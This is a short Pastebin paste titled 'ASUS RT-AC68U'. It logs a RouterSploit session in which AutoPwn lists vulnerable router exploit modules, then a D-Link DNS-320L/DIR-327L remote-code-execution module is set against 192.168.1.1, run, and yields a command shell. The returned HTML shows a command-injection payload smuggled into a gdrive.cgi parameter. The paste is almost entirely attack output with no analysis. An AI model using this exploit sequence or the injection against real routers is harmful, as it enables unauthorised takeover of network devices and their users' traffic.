Guest User

ASUS RT-AC68U

a guest
Apr 25th, 2016
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. [+] Device is vulnerable!
  2. - exploits/dlink/dwr_932_info_disclosure
  3. - exploits/dlink/dns_320l_327l_rce
  4. - exploits/asmax/ar_804_gu_rce
  5. rsf (AutoPwn) > use exploits/dlink/dns_320l_327l_rce
  6. rsf (D-LINK DNS-320L & DIR-327L RCE) > set target 192.168.1.1
  7. [+] {'target': '192.168.1.1'}
  8. rsf (D-LINK DNS-320L & DIR-327L RCE) > check
  9. [+] Target is vulnerable
  10. rsf (D-LINK DNS-320L & DIR-327L RCE) > run
  11. [*] Running module...
  12. [+] Target is vulnerable
  13. [*] Invoking command loop...
  14. cmd > ?
  15. <HTML><HEAD><script>location.href='/cloud_sync.asp?flag=cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;?;echo%20
Advertisement
Add Comment
Please, Sign In to add comment